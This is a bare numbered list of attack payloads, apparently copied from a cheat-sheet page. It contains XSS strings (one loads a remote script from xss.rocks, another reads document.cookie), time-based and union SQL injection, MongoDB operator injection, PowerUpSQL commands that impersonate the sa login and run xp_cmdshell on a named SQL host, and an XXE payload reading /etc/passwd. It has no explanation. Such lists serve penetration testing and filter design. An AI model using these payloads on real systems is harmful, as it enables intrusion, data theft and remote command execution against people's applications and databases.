| 1 |
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> |
| 2 |
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS"> |
| 3 |
<Video> <source onerror = "javascript: alert (XSS)"> |
| 4 |
<Input value = "XSS" type = text> |
| 5 |
<applet code="javascript:confirm(document.cookie);"> |
| 6 |
<isindex x="javascript:" onmouseover="alert(XSS)"> |
| 7 |
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> |
| 8 |
"><img src="x:x" onerror="alert(XSS)"> |
| 9 |
"><iframe src="javascript:alert(XSS)"> |
| 10 |
<object data="javascript:alert(XSS)"> |
| 11 |
<isindex type=image src=1 onerror=alert(XSS)> |
| 12 |
<img src=x:alert(alt) onerror=eval(src) alt=0> |
| 13 |
<iframe/src="data:text/html,<svg onload=alert(1)>"> |
| 14 |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> |
| 15 |
<img src="/" =_=" title="onerror='prompt(1)'"> |
| 16 |
<script x> alert(1) </script 1=2 |
| 17 |
SLEEP(5)-- |
| 18 |
SELECT BENCHMARK(1000000,MD5('A')); |
| 19 |
id=1 OR SLEEP(25)=0 LIMIT 1-- |
| 20 |
id=1) OR SLEEP(25)=0 LIMIT 1-- |
| 21 |
id=1' OR SLEEP(25)=0 LIMIT 1-- |
| 22 |
id=1') OR SLEEP(25)=0 LIMIT 1-- |
| 23 |
id=1)) OR SLEEP(25)=0 LIMIT 1-- |
| 24 |
id=SELECT SLEEP(25)-- |
| 25 |
/?id=1+union+select+1,2,3/* |
| 26 |
/?id=1;select+1&id=2,3+from+users+where+id=1-- |
| 27 |
%3C |
| 28 |
true, $where: '1 == 1' |
| 29 |
, $where: '1 == 1' |
| 30 |
$where: '1 == 1' |
| 31 |
', $where: '1 == 1' |
| 32 |
1, $where: '1 == 1' |
| 33 |
{ $ne: 1 } |
| 34 |
', $or: [ {}, { 'a':'a |
| 35 |
' } ], $comment:'successful MongoDB injection' |
| 36 |
db.injection.insert({success:1}); |
| 37 |
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1|| 1==1 |
| 38 |
' && this.password.match(/.*/)//+%00 |
| 39 |
' && this.passwordzz.match(/.*/)//+%00 |
| 40 |
'%20%26%26%20this.password.match(/.*/)//+%00 |
| 41 |
'%20%26%26%20this.passwordzz.match(/.*/)//+%00 |
| 42 |
{$gt: ''} |
| 43 |
[$ne]=1 |
| 44 |
Invoke-Command -ScriptBlock { Invoke-Command -ScriptBlock { . s:\PowerUpSQL.ps1; Get-SQLInstanceDomain -Verbose } -Session $session } -Session $session |
| 45 |
Get-SQLQuery -Verbose -Instance "UFC-SQLDev.us.funcorp.local,1433" -Query "execute as login='dbuser'; execute as login='sa'; exec xp_cmdshell 'whoami'" |
| 46 |
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>" |
Комментарии